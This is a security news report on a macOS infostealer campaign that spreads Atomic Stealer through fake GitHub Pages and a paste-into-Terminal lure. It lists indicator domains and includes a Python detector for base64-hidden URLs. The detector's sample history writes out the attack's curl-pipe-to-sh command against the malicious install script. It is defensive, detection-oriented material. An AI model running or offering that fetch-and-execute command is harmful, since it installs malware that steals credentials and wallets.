Large-scale Campaign Leveraging GitHub Pages to Deliver macOS Credential Stealer

Security teams are warning of a large-scale infostealer campaign that leverages fraudulent GitHub Pages to trick macOS users into installing malicious software.

The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team has identified numerous counterfeit repositories impersonating legitimate companies, including password managers, financial institutions, and productivity tools.

These pages rank highly in search results thanks to aggressive SEO tactics on Bing and Google, making detection by end users more difficult.

Attack Overview

Threat actors published two GitHub Pages under the username “modhopmduck476” with headlines such as “Install LastPass on MacBook” and “LastPass Premium on MacBook.”

When users clicked the supposed download links, they were redirected to a secondary site hosted at macprograms-pro[.]com.

That page instructs victims to paste a command into the macOS Terminal; the command decodes a base64-encoded URL and fetches it with curl.

When decoded, the URL points to bonoud[.]com/get3/install.sh, which in turn fetches and executes a shell script to install what appears to be an update payload.

The shell script delivers the Atomic Stealer malware (also known as AMOS) by downloading the payload into the macOS temporary directory.

Atomic Stealer has been active since at least April 2023 and is commonly used by financially motivated cybercrime groups to harvest credentials, browser data, and cryptocurrency wallets.

The malware’s persistence mechanisms and exfiltration routines remain under investigation, but early analysis indicates the stealer is capable of evading basic endpoint security controls.

Security analysts link this campaign to similar macOS malware distribution efforts documented by researchers such as Dhiraj Mishra, who highlighted parallel tactics in recent Medium posts.

To evade takedown efforts, the threat actors have created multiple GitHub usernames and repositories with near-identical naming conventions.

When two fraudulent LastPass pages were reported, GitHub removed them promptly, but nearly identical clones reappeared under different accounts.

The quick rotation of repository names and user profiles has enabled the campaign to maintain high visibility in search engine results.

Indicators of Compromise and Mitigation

Security teams should monitor for any execution of the following URLs or commands in macOS environments: hxxps://ahoastock825[.]github[.]io/.github/lastpass, macprograms-pro[.]com/mac-git-2-download.html, bonoud[.]com/get3/install.sh, and bonoud[.]com/get3/update.

Additional fraudulent repositories impersonating dozens of companies, from 1Password to Robinhood, are listed in the campaign's Indicators of Compromise (IoCs) at the end of LastPass's advisory.

Administrators are advised to audit web proxy logs for requests to these domains and block them at the perimeter.
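As an added example (not code from the advisory, LastPass, or Cyber Press), the following Python scans constructed shell-history lines for the pattern described above: a base64 blob that decodes to a URL on one of the advisory's indicator domains, which a plain string match on proxy or history logs would miss. The regex thresholds and the sample history lines are assumptions made for this example.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Domains named in the advisory, with the defanging brackets removed for matching.
IOC_DOMAINS = {"ahoastock825.github.io", "macprograms-pro.com", "bonoud.com"}
# A run of base64 alphabet long enough to hold a URL, with optional padding (assumed threshold).
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

def decode_embedded_urls(command: str) -> list[str]:
    """Collect URLs written plainly in a command plus URLs hidden inside base64 blobs."""
    urls = URL_RE.findall(command)
    for token in B64_TOKEN_RE.findall(command):
        stripped = token.rstrip("=")
        padded = stripped + "=" * (-len(stripped) % 4)  # normalise padding before decoding
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # hashes and other long alphanumerics are not a decodable URL
        urls.extend(URL_RE.findall(decoded))
    return urls

def matching_iocs(command: str) -> set[str]:
    """Return the IoC domains a command reaches, directly or after base64 decoding."""
    hits = set()
    for url in decode_embedded_urls(command):
        host = (urlparse(url).hostname or "").lower()
        for domain in IOC_DOMAINS:
            if host == domain or host.endswith("." + domain):
                hits.add(domain)
    return hits

def scan_history(lines: list[str]) -> list[tuple[str, set[str]]]:
    """Return (line, hits) for every line that references at least one IoC domain."""
    return [(line, hits) for line in lines if (hits := matching_iocs(line))]

# Constructed sample of collected zsh history; the second entry mirrors the advisory's
# paste-into-Terminal pattern and is built here from the URL the advisory names.
SAMPLE_B64 = base64.b64encode(b"https://bonoud.com/get3/install.sh").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    f'curl -fsSL "$(echo {SAMPLE_B64} | base64 -d)" | sh',
    "curl -fsSL https://example.org/legit-installer.sh",
]

if __name__ == "__main__":
    for line, hits in scan_history(SAMPLE_HISTORY):
        print(f"IoC hit {sorted(hits)}: {line}")
```

The same decode-then-match step applies to proxy logs, where the encoded URL may appear as a query parameter rather than in a shell command.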

LastPass continues to monitor the campaign, working with GitHub and search engine providers to disrupt SEO-driven malicious referrals.

Users should only install macOS applications from verified sources, enable Gatekeeper protections, and employ endpoint detection solutions capable of flagging unusual shell script executions.

Updating macOS to the latest version and performing regular threat intelligence checks against known IoCs will further reduce exposure to this evolving stealer distribution campaign.


AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
